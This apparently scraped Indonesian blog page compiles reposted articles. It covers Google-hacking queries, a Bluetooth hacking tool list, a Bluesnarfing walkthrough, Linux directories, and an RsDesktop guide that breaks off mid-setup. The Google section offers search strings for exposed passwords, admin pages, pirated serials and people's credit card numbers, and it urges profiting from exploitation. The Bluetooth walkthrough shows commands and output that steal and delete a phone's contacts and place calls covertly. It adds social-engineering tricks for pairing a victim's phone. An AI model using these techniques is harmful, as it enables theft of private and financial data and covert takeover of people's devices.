  • Penggunaan string (+) digunakan untuk melakukan pencarian paksa terhadap huruf yang serupa. Sedangkan (-) digunakan untuk men-tidak sertakan sebuah kata dalam pencarian.
  • Untuk mencari sebuah susunan kata tertentu dengan sangat tepat, maka anda perlu menggunakan string (“ “)
  • Sedangkan titik (.) digunakan untuk melakukan metode pencarian text satu karakter.
  • Tanda bintang melambangkan segala huruf.
  • Syntax site: digunakan untuk memerintahkan google supaya melakukan pencarian dalam situs tertentu saja. Alamat situsnya dapat dimasukan sesudah tanda titik dua. (e.g site:www.th0r.name)
  • Syntax filetype: digunakan untuk memerintahkan google untuk melakukan pencarian terhadap jenis file secara ter-spesifikasi. Jenis file yang ingin dicari dapat diposisikan setelah tanda titik dua.
  • Syntax link: digunakan untuk memerintahkan google supaya hanya melakukan pencarian dalam hyperlinks tertentu.
  • Syntax cache: digunakan untuk memerintahkan google untuk menampilkan versi daripada sebuah webpage pada saat google membukanya. Keterangan mengenai alamat website dapat ditambahkan pada bagian akhir sesudah tanda titik dua.
  • Syntax intitle: dalam hal ini google diperintahkan hanya untuk mencari keterangan berdasarkan title daripada dokumen dokumen tertentu, sesuai dengan yang kita ketikan pada bagian akhir syntax setelah tanda titik dua.
  • Syntax inurl: Google akan melakukan pencarian data dalam syntax URL tertentu yang diberikan setelah tanda titik dua.

Mengenal lebih dalam Syntax Untuk Google Hacking
Setelah mengenal dasar metode pencarian menggunakan google.com, sekarang kita akan beralih ke syntax yang dapat dikatakan lebih specific dan lebih komplikasi dibandingkan syntax yang telah diberikan diatas. Mari sekarang kita perhatikan syntax dibawah ini:

intitle:”Index of” passwords modified
allinurl:auth_user_file.txt
“access denied for user” “using password”
“A syntax error has occurred” filetype:ihtml
allinurl: admin mdb
“ORA-00921: unexpected end of SQL command”
inurlasslist.txt
“Index of /backup”
“Chatologica MetaSearch” “stack tracking:”
Contoh contoh yang diberikan diatas adalah contoh contoh syntax yang bias dikatakan digunakan untuk mencari password ataupun admin page, dan juga bias digunakan untuk mencari page yang tidak seharusnya dapat dibuka oleh user biasa. Kombinasi kombinasi lain dapat digunakan untuk melakukan pencarian yang lain dan hanya perlu dimodifikasi sesuai dengan kebutuhan dan target anda.
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
Sedangkan syntax yang diatas ini digunakan untuk mencari nomor kartu kredit orang menggunakan google.com

Bedah Syntax
Setelah melihat beberapa syntax yang lebih complex diatas, mari kita sedikit membahas maksud dari syntax syntax yang ada dibawah ini.
“parent directory ” /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory “Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Seperti yang dapat kalian perhatikan dari keseluruhan syntax. Bagian yang diganti hanya selalu pada bagian sesudah kata “Parent Directory”. Kenapa? Setelah kita pelajari dibagian awal artikel ini tadi bahwa syntax (“ “) digunakan untuk melakukan pencarian kalimat secara pasti, dan (-) digunakan untuk men-tidak ikut sertakan sebuah kata dalam keseluruhan kalimat pencarian. Sehingga dalam syntax ini dapat kita artikan secara kasar juga sebagai berikut:

  • “Parent Directory”  Pencari sedang melakukan pencarian untuk kata Parent Directory secara pasti dan tidak secara terpencar (Parent sendiri dan Directory sendiri)
  • Pencari menaruh apa yang ingin dia cari. (Contoh : /appz/ adalah aplikasi. Dan MP3, berarti dia mencari mengenai hal MP3)
  • -xxx  Pencari tidak menginginkan adanya konten xxx dalam pencariannya.
  • -html  Pencari tidak menginginkan adanya konten html dalam pencariannya.
  • -htm  Pencari tidak menginginkan adanya konten htm dalam pencariannya.
  • -php  Pencari tidak menginginkan adanya konten php dalam pencariannya.
  • Dan lain sebagainya.

List Syntax, serta Kombinasinya
Setelah membahas mengenai metode pencarian, syntax yang cukup komplikasi hingga beda arti syntax, pada bagian sebelumnya. Pada bagian ini kita akan membahas mengenai kombinasi syntax dan bagaimana fungsinya, serta bagaimana membaca arti syntax tersebut.
Inurl:Microsoft filetype:iso
Anda akan mencari pada setiap URL berbau kata Microsoft untuk segala file yang bertipe iso. Anda dapat merubah URL dan Filetype menjadi apapun sesuai kebutuhan anda.
“# -FrontPage-” inurl:service.pwd
Dengan menggunakan syntax ini, anda menyuruh google untuk mencarikan password frontpage untuk anda.
http://*:*@www”
Syntax diatas digunakan untuk melakukan pencarian password pada line url anda. Dalam kasus ini anda mencari user dan password yang tulisannya apa saja, pada domain name tertentu. (Masukan nama domain tanpa .com .net / .org) – (Contoh : “http://*:*@www” neotek)
Cara lain untuk menggunakan syntax ini dalam bentuk yang berkesebalikan ialah dengan cara menuliskan syntax seperti ini:
http://th0r:th0r@www”  dalam kasus ini anda mencari username dan password th0r pada website yang nantinya akan anda masukan alamatnya dibagian belakang.
“sets mode +k”
Nampak seperti IRC? Memang betul. Ada banyak juga room di IRC yang menggunakan key untuk melakukan join kedalam room tersebut dan dengan menggunakan syntax ini, anda akan dapat menemukan beberapa key yang tercatat dalam log percakapan channel / room tersebut.
Allinrul: Admin mdb
Kalian akan menemukan banyak web page sehubungan dengan administrator system page.
Intitle: “Index Of” config.php
Dengan syntax diatas, kalian akan diberikan setumpuk data mengenai website website yang memiliki file config.php
Bahkan google dapat juga dijadikan ajang untuk mencari warez serial code. Katakanlah anda membutukan Windows XP Pro serial number. Anda hanya perlu membuka http://www.google.com dan mengetikan syntax sebagai berikut:
“Windows XP Professional” 94FBR
Yang dapat juga kita artikan sebagai pencarian kata Windows XP Professional tanpa di pisahkan. Sedangkan 94FBR itu sendiri adalah sebuah code yang kerapkali dimasukan ke dalam bagian daripada registration code yang ada pada kebanyakan software Microsoft. Oleh dari karena hal tersebut, penggunaan code 94FBR mungkin akan cukup membantu dalam melakukan pencarian serial code. Akan tetapi, segalanya tetap dapat dimodifikasi sesuai dengan keinginan serta keperluan anda.
Sekian cerita singkat saya kali ini mengenai Google Hacking. Perlu diingat bahwa bagaimana tingkat kesuksesan dalam menggunakan google hacking ini adalah 100% tergantung daripada ide dan kreatifitas anda sendiri dalam mengkombinasikan syntax dan menyesuaikan data yang anda ketahui mengenai suatu target tertentu. Tapi yang perlu saya jelaskan disini, bahwa google hacking adalah salah satu tehnik yang cukup mengerikan apabila anda dapat menggunakannya dengan sangat baik. Hal inipun didukung dengan kenyataan bahwa kebanyakan ahli security di dunia telah menempatkan Google Hacking sebagai salah satu tehnik yang sejajar dan sama berbahayanya dengan SQL Injection, Cross-site Scripting dan Remote Execution Command.
Credit and Special Thanks To: Johnny Long With His Book Named as “Google Hacking”
Tak lupa juga saya mengucapkan terima kasih kepada Epel (Thanks yoo =P), Ignes (Yang sudah nemenin chat waktu lg buat ini artikel), Cindy (Yang juga sudah nemenin ngobrol sampe artikelnya kelar) Hehehe, juga Jeffry dan Nico. Serta beberapa teman teman saya yang lainnya.
Akhir kata, saya hanya ingin mengucapkan. Teknologi berkembang untuk di eksploitasi fungsi dan manfaatnya. Kalau meng-eksploitasi kekayaan alam itu salah, meng-eksploitasi funsi teknologi adalah sebuah hal dapat dikatakan bagus. Oleh dari karena itu, teruslah mencari keuntungan daripada penggunaan system itu sendiri.

Salam,

from http://www.indoforum.org/showthread.php?t=1363

Read more ...

Essential Bluetooth hacking

Bluetooth technology is great. No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?).

If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them.

This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices.

Discovering Bluetooth Devices

BlueScanner - BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. Download BlueScan.

BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. Download BlueSniff.

BTBrowser - Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 - the Java Bluetooth specification. Download BTBrowser.

BTCrawler -BTCrawler is a scanner for Windows Mobile based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. Download BTCrawler.

Hacking Bluetooth Devices

BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. Download BlueBugger.

CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. Download CIHWB.

Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode. Download Bluediving.

Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. Download T-BEAR.

Bluesnarfer - Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. Download Bluesnarfer.

BTcrack - BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. Download BTcrack.

Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. Download Blooover II.

BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. Download BlueTest.

BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. Download BTAuding.

What’s next? Let everyone know to disable Bluetooth until they really need it. Additionally, make sure to update your phone software on a regular basis.


from: http://autonux.freehostia.com
Read more ...

A Bluetooth [in]Security

Bluetooth adalah salah satu teknologi pengganti kabel yang mengkonsumsi
sedikit tenaga listrik, memiliki harga yang relatif murah, berjarak relatif
pendek (10-100m), dan dapat digunakan untuk pertukaran data dan suara.

Riset tentang teknologi "bluetooth" yang telah dilakukan oleh ericsson(tm)
pada tahun 1998 telah memberikan dampak yang cukup besar pada teknologi
"pengganti kabel" atau yang lebih sering aku kenal dengan "wireless technology".
Riset ini Kemudian dilanjutkan oleh sebuah grup yang menamakan dirinya
Special Interest Group dengan "codename" bluetooth dan telah di dukung oleh
banyak perusahaan besar yang berkepentingan dengan teknologi ini. Sehingga
pada tahun 1999 dikeluarkanlah versi pertama (bluetooth ver 1.0) dan versi
yang sekarang digunakan adalah versi 2.0 (merupakan ver 1.2 ditambah EDR).

Teknologi bluetooth sampai saat ini tetap dipakai dan di kembangkan pada
kurang lebih 856 produk[3].

---// Why attacking bluetooth ?

1. Bluetooth dipakai pada peralatan pribadi yang umumnya menyimpan
informasi penting yang bersifat pribadi juga dan menjadikannya
sebagai target yang berharga bagi penyerang

2. Untuk menyerang device bluetooh penyerang tidak perlu untuk melewati
Lapisan firewall, policy, third party security application, IDS/IPS.

3. Bisa ditemukan dibanyak tempat di karenakan layanan ini di pakai
dibanyak "device".

---// Technical Details

- Menggunakan frekuensi 2,4GHz
- 79 channel, dengan lompatan frekuensi 1600 hops/second
- Menggunakan "single chip radio" sehingga harganya relatif murah
- Memiliki "range" 10-100 Meter
- Menggunakan 2.5 mW
- Memiliki Data Rate 1Mbps

---// Bluetooth Mode

-------[ 1. Service mode

a. mode menyala ("on" mode )
Untuk mode "on" terdapat mode "discoverable" dan "un-discoverable",
dimana pada saat discoverable "device" akan dapat dan untuk di temukan
oleh "device" lain. Sedangkan un-discoverable mode mengakibatkan
secara umum tidak dapat di temukan oleh "device" lain.

b. mode tidak menyala ( "off" mode )
Layanan bluetooth mati pada mode ini

c. mode otomatis ( "automatic" mode )
Layanan ini akan memudahkan aplikasi untuk menggunakan layanan bluetooth

-------[ 2. Security mode

a. Security mode level 1
Tidak ada mode sekuriti sama sekali

b. Security mode level 2
Sekuriti terdapat pada level "service", tetapi pada level "device"
tidak ada terdapat.

c. Security mode level 3

Sekuriti terdapat pada level "device" dan menerapkan sekuriti pada
setiap level yang lebih rendah.

---// Bluetooth Security threat

-------[ 1. Bluejacking

Teknik ini dilakukan dengan cara mengirimkan pesan/gambar/nomer
telpon tanpa ijin kepada target, tujuannya adalah mulai dari perbuatan
iseng sampai pada "social engineering" untuk memancing target melakukan
pairing kepada "device" penyerang.

-------[ 2. Bluesnarfing

Teknik ini mengijinkan penyerang untuk terhubung ke "device" milik
target tanpa diketahui pemiliknya dan akan mengakibatkan penyerang
dapat mengakses data data penting yang tersimpan didalam "device" target
seperti daftar nomer telepon (buku telepon), "business card", "images"
bahkan IMEI (International Mobile Equipment Identity ) yang dapat
mengakibatkan nomer tersebut untuk di "clonning".

-------[ 3. BlueBugging

Teknik ini mengakibatkan "device" target dan penyerang terhubung secara
serial dan mengakibatkan penyerang memiliki kendali penuh terhadap
"device" target sehingga penyerang juga dapat mengeksekusi set perintah AT
(ASCII Terminal) diantaranya untuk melakukan panggilan, mengirim dan
membaca SMS, melakukan koneksi jaringan bahkan internet melalui "device"
target sampai kepada "identity theft".

-------[ 4. BlueSmack

Teknik ini melakukan serangan Denial Of Service terhadap device target, salah
satu caranya adalah memanfaatkan perintah l2ping pada protokol L2CAP.

-------[ 5. Backdoor Attack

Teknik ini adalah dengan memanfaatkan "pairing" yang telah tercipta antara
"device" target dan penyerang. Memanfaatkan Kelengahan Target dan Teknik
social engineering.


---// Basic Penetration

Berikut akan aku lakukan penetrasi mendasar terhadap bluetooth sekuriti,
dengan harapan akan memberikan pemahaman mendalam tentang ini.

-------[ 0. Info

Target : Mobile phone Sony ericsson t68i
Penyerang : Toshiba tecra 8100
Linux Ubuntu 5.10 Operating system
USB bluetooth dongle with Bluez

Tools : Bluesnarfer
Bluez-utils
RedFang

-------[ 1. Preparation

Sekarang lakukan checking terhadap bluetooth device (USB dongle) menggunakan
hciconfig (packet Bluez)

//--- command ----//

y3dips@hogwartz:~$ hciconfig -a hci0
hci0: Type: USB
BD Address: 00:09:DD:10:4E:B1 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING PSCAN ISCAN
RX bytes:394 acl:0 sco:0 events:18 errors:0
TX bytes:319 acl:0 sco:0 commands:17 errors:0
Features: 0xff 0xff 0x0f 0x00 0x00 0x00 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH HOLD SNIFF PARK
Link mode: SLAVE ACCEPT
Name: 'hogwartz-0'
Class: 0x3e0100
Service Classes: Networking, Rendering, Capturing
"device" Class: Computer, Uncategorized
HCI Ver: 1.1 (0x1) HCI Rev: 0x460 LMP Ver: 1.1 (0x1) LMP Subver: 0x460
Manufacturer: Cambridge Silicon Radio (10)

//--- command ----//

didapatkan beberapa informasi penting, diantaranya:
1. Type: USB
2. BD Address: 00:09:DD:10:4E:B1
3. Service Classes: Networking, Rendering, Capturing

Baiklah, ternyata "device" berjalan baik dan dikenali oleh system.

-------[ 2. Scanning

Setelah semua persiapan berjalan dengan baik maka selanjutnya adalah menemukan
target, untuk mendeteksi layanan bluetooth yang aktif (mode menyala) dan
juga "discoverable", aku hanya menggunakan hcitool (paket Bluez)

//--- command ----//

y3dips@hogwartz:~$ hcitool scan
Scanning ...
00:0A:D9:49:B6:8B T68i
00:0C:55:FF:F3:B6 heaven-0
00:D5:F9:33:B6:A4 dodlesvck
00:60:57:44:56:B3 6310i

//--- command ----//

Yupe, aku menemukan ada 4 buah "device"yang mengaktifkan layanan bluetoothnya.
dan aku putuskan untuk bereksplorasi satu persatu, untuk itu aku putuskan
akan melakukan penetrasi sesuai urutan :)

Selanjutnya adalah melakukan perkenalan lebih jauh dengan "device" tersebut,
dan untuk ini digunakanlah sdptool (paket bluez) untuk melakukan browsing
dan secara spesifik aku tambahkan options "grep" khusus untuk menemukan
service apa saja yang di layani oleh "device" tersebut, "device" akan di kenali
dengan alamat bluetooth.

dalam hal ini untuk "device" pertama adalah 00:0A:D9:49:B6:8B

//--- command ----//

y3dips@hogwartz:~$ sdptool browse 00:0A:D9:49:B6:8B | grep Service\ Name
Service Name: Dial-up Networking
Service Name: Fax
Service Name: Voice gateway
Service Name: Serial Port 1
Service Name: Serial Port 2
Service Name: OBEX Object Push
Service Name: IrMC Synchronization
Service Name: Voice gateway

//--- command ----//

Dan kita dapatkan bahwa device tersebut memberikan service Dial-up Networking,
Fax, Voice Gateway, Serial Port, OBEX, IrMC.

Untuk melakukan cek hubungan dengan device maka kita dapat melakukan ping.

//--- command ----//

y3dips@hogwartz:~$ sudo l2ping 00:0A:D9:49:B6:8B
Ping: 00:0A:D9:49:B6:8B from 00:09:DD:10:4E:B1 (data size 44) ...
0 bytes from 00:0A:D9:49:B6:8B id 0 time 46.69ms
0 bytes from 00:0A:D9:49:B6:8B id 1 time 31.24ms
0 bytes from 00:0A:D9:49:B6:8B id 2 time 37.95ms
0 bytes from 00:0A:D9:49:B6:8B id 3 time 33.01ms
0 bytes from 00:0A:D9:49:B6:8B id 4 time 48.04ms
5 sent, 5 received, 0% loss

//--- command ----//

-------[ 3. Owning

Setelah melakukan Scanning dan mendapatkan alamat target dan informasi
mengenai service yang dilayani oleh device tersebut maka selanjutnya kita
akan melakukan "snarfing" terhadap bluetooth device (Bluesnarfing).

Salah satu erangan yang mungkin adalah membaca buku telepon dari device
dengan menggunakan bluesnarfer.

//--- command ----//

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -r 1-10
"device" name: T68i
+ 1 - My Sephia /M : 08883535266
+ 3 - Mbah Marijan/W : 021454545
+ 5 - Osama Laden/W : 662224258
+ 7 - Warung Pecel Bu Roso/W : 0214545889
+ 9 - Superman/W : 911
bluesnarfer: release rfcomm ok

//--- command ----//

Selanjutnya kita juga dapat menghapus buku telepon

//--- command ----//

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -w 1-10
"device" name: T68i
delete of entry 1 successfull
delete of entry 2 successfull
delete of entry 3 successfull
delete of entry 4 successfull
delete of entry 5 successfull
delete of entry 6 successfull
delete of entry 7 successfull
delete of entry 8 successfull
delete of entry 9 successfull
delete of entry 10 successfull
bluesnarfer: release rfcomm ok

memeriksa apakah sudah terhapus

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -r 1-10
"device" name: T68i
bluesnarfer: release rfcomm ok

//--- command ----//

Selain itu aku akan mencoba melakukan Bluebugging dengan cara mengeksekusi
perintah AT, dalam hal ini ATD (melakukan panggilan)

//--- command ----//

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -c 'ATD555;'
"device" name: T68i
custum cmd selected, raw output
OK
bluesnarfer: release rfcomm ok
y3dips@hogwartz:~/Desktop/bluetooth/pentest/snarf$

//--- command ----//

Tapi ingat, dengan melakukan panggilan ini maka akan tampak pada layar target
bahwa sednag melakukan panggilan terhadap nomer tertentu. (Sehingga sebaiknya
dalam melakukan panggilan pada saat target tidak berinteraksi langsung dengan
device)

---// 31337 penetration

-------[ 1. Backdooring

Teknik Backdooring ini bisa dilakukan dengan cara berinteraksi secara langsung
ataupun tidak, teknik ini bertujuan membuat "device" target melakukan "pairing"
dengan device penyerang.

Social enggineering berperanan penting pada teknik ini.

Example

a. Berinteraksi langsung

Seperti teknik social engineering yang pada umumnya dilakukan adalah
dengan cara berinteraksi secara langsung dengan device target.

real life example:

Ingat, perubahan kartu SIM, menghidupkan dan mematikan Device tidak
menghapus pairing yang telah terbuat, celah ini membuat aku berpura-pura
kehabisan batere handphone dan meminjam handphone target untuk mengirim
sms, agar target semakin yakin maka aku gunakan nomer yang aku miliki
(agar lebih meyakinkan lagi maka sebiknya handphone kamu emang tidak
bisa menyala), setelah itu cobalah lakukan pairing kedevice kamu, sebelum
itu ada 2 hal yang harus aku lakukan

1. menentukan PIN untuk diisikan dari handphone target

//--- command ----//
root@hogwartz:~# echo "4321" > /etc/bluetooth/pin
//--- command ----//


2. Dan kamu perlu membaca syslog untuk mengetahui alamat target
yang terhubung.

//--- command ----//
root@hogwartz:~# tail -f /var/log/syslog | grep hcid
Aug 21 20:25:30 localhost hcid[8880]: pin_code_request \
(sba=00:09:DD:10:4E:B1, dba=00:0A:D9:49:B6:8B)
//--- command ----//

ya, dan sekarang aku tinggal matikan handphone dan tukar kartu SIM kembali,
selanjutnya tinggal bereksplorasi di "device" target.

b. Berinteraksi Tidak langsung

Cara kedua ini dikombinasikan dengan teknik BlueJacking, pada cara ini
aku hanya perlu mengirimkan gambar/text/lagu/ atau apapun ke device
target sehingga target akan melakukan cek terhadap info device pengirim
yang tampil pada "device" target dan jika target berniat menerima
gambar/text/lagu/ tersebut maka dia harus melakukan pairing dan perlu
memasukan sebaris PIN.

(nama device; yang bisa di definisikan pada deviceku), Karena karakter
di beberapa "device", jumlah karakter tidak dibatasi maka memungkinkan
kita untuk menuliskan sebaris kalimat yang "membujuk" (inti social
engineering) seperti "FOTO NADINE NIH?" atau "UNTUK MENERIMA KETIKKAN
4321"

Selanjutnya tinggal tunggu hasil pairing kita :).


-------[ 2. Detecting the undetected

Baiklah, sekarang bagaimana kalau "device" tersebut tidak di set discoverable
sehingga aku akan kesulitan mendapatkan alamat device, dan aku pun tidak mungkin
meminjam handphone ("device") target karena satu dan lain hal (pelit mungkin:P).

Beruntunglah aku dikarenakan ada satu tools yang dipublikasikan dengan nama
"redfang" dan mampu mendeteksi "device" bluetooth yang menyalakan layanannya
tetapi tidak di set discoverable.

//--- command ----//

y3dips@hogwartz:~/bt/fang$ sudo ./redfang -r 000AD949B689-000AD949B68D
redfang - the bluetooth hunter ver 2.5
(c)2003 @stake Inc
author: Ollie Whitehouse
enhanced: threads by Simon Halsall
enhanced: "device" info discovery by Stephen Kapp
Scanning 5 address(es)
Address range 00:0a:d9:49:b6:89 -> 00:0a:d9:49:b6:8d
Found: T68i [00:0a:d9:49:b6:8b]
Getting "device" Information.. Failed.

//--- command ----//

Dan akupun mendapatkan alamat target. :), salah satu kelemahannya adalah
kecepatannya dalam menemukan adalah sangat lambat, aku sering menggunakan
options "-t" untuk meningkatkan waktu timeout dan mempercepat scanning.
atau bisa melakukan "recursive execute". (automated ? -- in proggress)


---// Mitos dalam "bluetooth [in]security"

[1] Matikan saja layanan Bluetoothnya niscaya akan aman

Mematikan layanan bluetooth ("off" mode) pada "device" tidaklah 100%
akan membuat "device" aman. Serangan yang mungkin dilakukan adalah
Social engginering dan Malicious program (virus, worm & trojan)
yang dapat secara otomatis menyalakan layanan bluetooh ("on" mode)
atau bahkan melakukan pairing/backdoor attack ke bluetooth "device".

Jadi perkuat device anda dengan firewall dan juga antivirus

[2] Di Buat "[un]discoverable" akan aman

Lihat sub-chapter "31337 penetration" pada bagian kedua "Detecting
the undetected"

[3] Tidak ada informasi penting di bluetooth "device"

Salah, ambil contoh "mobile "device" (phone, smart phone, laptop)"
Hampir seluruh data penting tersimpan, misalkan mobile phone, disana
terdapat seluruh nomer nomer yang penting bagi anda meskipun anda
tidak termasuk orang penting :P.

[4] Jaraknya pendek

Jarak bluetooth device umumnya pendek 10-100 Meter, tetapi dengan
adanya teknik untuk memperkuat signal[6] maka jangkauan pun bisa
di perjauh bahkan sampai 1 km.

[5] Penyerangnya pasti akan tampak "aneh" dan "mencurigakan" [karena membawa
-bawa laptop dan bluetooth device yang di modifikasi (perkuat sinyal)?]

Tidak juga, bahkan sekarang via mobile phone/PDA (java supported)
bisa melakukan "assessment"[2].

---// Bertahan ?

[1] Update informasi anda tentang "device" anda (khususnya soal security)
[2] Update Frimware anda, jikalau termasuk "device" yang di curigai
[3] Periksa daftar "trusted Pair", hapus yang sudah tidak dibutuhkan, hindari
backdoor attack
[4] Gunakan Fitur keamanan tambahan (eg: Antivirus, Firewall)
[5] Untuk meminimalisir serangan matikan layanan bluetooth anda jika tidak
digunakan
[6] Jikapun dibutuhkan, buatlah PIN yang relatif kuat.
[7] Pastikan untuk tidak sembarangan melakukan koneksi/pairing (eg: terima
file dari "unknown device")


---// Clue

Sebagian handphone memiliki celah terserang teknik bluesnarfing ataupun
bluebug saat visible (discoverable) dan sebagian lainnya non-visible
(non-discoverable), sementara beberapa jenis lainnya tidak vulnerable
kecuali dengan menggunakan backdoor attack dan teknik bluejacking
(Social engineering)

---// Kamus

Pairing adalah suatu bagian (state) yang dilakukan apabila dua buah
"device" setuju untuk berkomunikasi satu sama lainnya, setelah state
ini terjadi maka apabila ingin terjadi komunikasi ulang maka akan
membypass proses pencarian (discovery) dan otentikasi (authentication)
yang biasa terjadi pada saat interaksi.

---// Referensi

[1] y3dips, "Owned a mobile "device" via bluetooth", dipresentasikan dan
didemokan pada "Cryptography and Wireless security seminar", 2006
[2] Trifinite official site`s. http://trifinite.org
[3] SIG. http://bluetooth.org
[4] http://thebunker.net
[5] wikipedia. http://en.wikipedia.org
[6] bluesniper. http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt1/

---// Greetz

my lovely "ana"
echo|staff, echo|members
all Indonesian Security Groups
you! ... oh yes, you .. who read the rest of this article`s

=== added from y3dips echo|zine, volume 4 issue 15 ===
Read more ...

Fungsi Direktori di Linux

Saya akan coba menganalogikan fungsi dari directori yang ada di Linux dengan Windows 9x meskipun tidak dapat dikatakan sama persis.
/ : disebut juga root directori, seperti Windows/DOS kita mengenalnya dengan istilah main directory atau directori utama, C:, yang kemudian di dalamnya terdapat sub-sub directori.
/bin : berisi dengan aplikasi-aplikasi dasar Linux yang dapat diakses oleh semua user, di Windows kita mengenalnya dengan directori C:WindowsCommand
/usr : directori yang memuat aplikasi, dokumentasi, konfigurasi aplikasi, library, source aplikasi Linux.
/usr/bin: berisi dengan aplikasi-aplikasi Linux yang dapat diakses oleh semua user, di Windows kita mengenalnya dengan directory C:Program Files
/etc : berisi dengan file-file konfigurasi sistem, di Windows dapat dianggap sebuah directory yang berisi file-file dengan extension .INI atau .CFG.
/opt : hampir sama fungsinya dengan /usr/bin
/sbin : berisi aplikasi-aplikasi dasar yang hanya dapat diakses oleh root atau superuser.
/usr/sbin: berisi aplikasi-aplikasi untuk administrasi sistem lebih jauh lagi, dan hanya bisa diakses oleh root atau superuser.
/boot : berisi file-file yang berhubungan dengan kernel, kalau di Windows kita akan melihat file-file tersebut sebagai MSDOS.SYS, IO.SYS dan COMMAND.COM
/dev : berisi file-file yang mewakili hardware-hardware, misal Paralel Port (LPT) yang biasanya untuk Printer /dev/lpt, soundcard /dev/dsp, harddisk IDE Primary Master /hda, dan lain-lain
/lib : berisi file-file library, kalau di Windows kita akan melihat sebuah directory yang berisi file-file dengan extension .DLL
/usr/doc: berisi file-file dokumentasi Linux dan aplikasinya.
Read more ...

RsDesktop pada PCLinuxOS

PERHATIAN:

1. Jangan pernah mencoba ini jika anda tidak tau apa yang anda lakukan.

2. Jangan pula mencoba ini jika anda tidak tau apa itu Linux dan anda tidak tau serta tidak mengerti perintah perintah nix variant.

3. siapkan rokok + kopi secukup nya jika anda perokok berat , karena proses ini akan memakan waktu.

4. Tulisan ini di dedikasikan untuk kemajuan Linux di indonesia.

5. Dipersilahkan mengcopy atau memeperbanyak tulisan ini tanpa seijin saya demi kemajuan Linux di Indonesia.

Jika anda mempunyai satu komputer windows XP Profesional (SP2) dalam satu jaringan bersama dengan komputer PCLinuxOS, maka tiap komputer PCLinuxOS dalam jaringan tersebut akan dapat menggunakan windows XP beserta semua aplikasi di dalamnya (misalkan: Ms Office, Internet Explorer, Game Online dan lain-lain) tanpa menginstal apapun pada komputer PCLinuxOS. Menarik bukan?

Contoh:

Dalam satu internet café, terdapat 10 komputer PCLinuxOS dan 1 Komputer XP Pro (SP2), maka semua komputer PCLinuxOS akan dapat menggunakan Windows XP Pro tersebut pada waktu bersamaan dan dapat menggunakan semua aplikasi-aplikasi yang terinstall dalam Windows XP tersebut.

Pada mode full screen, desktop pada layar PCLinuxOS akan berganti menjadi desktop windows XP, sehingga pemakainya akan serasa menggunakan windows XP.

Proses komputasi tetap dilakukan pada komputer windows XP, sedangkan komputer PCLinuxOS hanya akan berfungsi sebagai desktop interface (tampilan), oleh karena itu banyaknya user yang sanggup dilayani oleh komputer windows XP tentunya akan sangat tergantung pada kapasitas memory dan kekuatan processor pada komputer windows XP.

Untuk melakukan ini, ada 2 tahap yang harus dilakukan, (1) yaitu persiapan seting pada sisi komputer windows XP dan (2) Perintah pada komputer PCLinuxOS.

Misal, untuk jaringan yang terdapat 1 unit komputer XP dan 2 unit Komputer PCLinuxOS, maka langkah pertama yang harus dilakukan adalah sbb:

Set IP komputer windows XP menjadi 192.168.0.3 / subnet 255.255.255.0
Set IP pada komputer PCLinuxOS:
PCLinuxOS
1 IP 192.168.0.1 / subnet 255.255.255.0
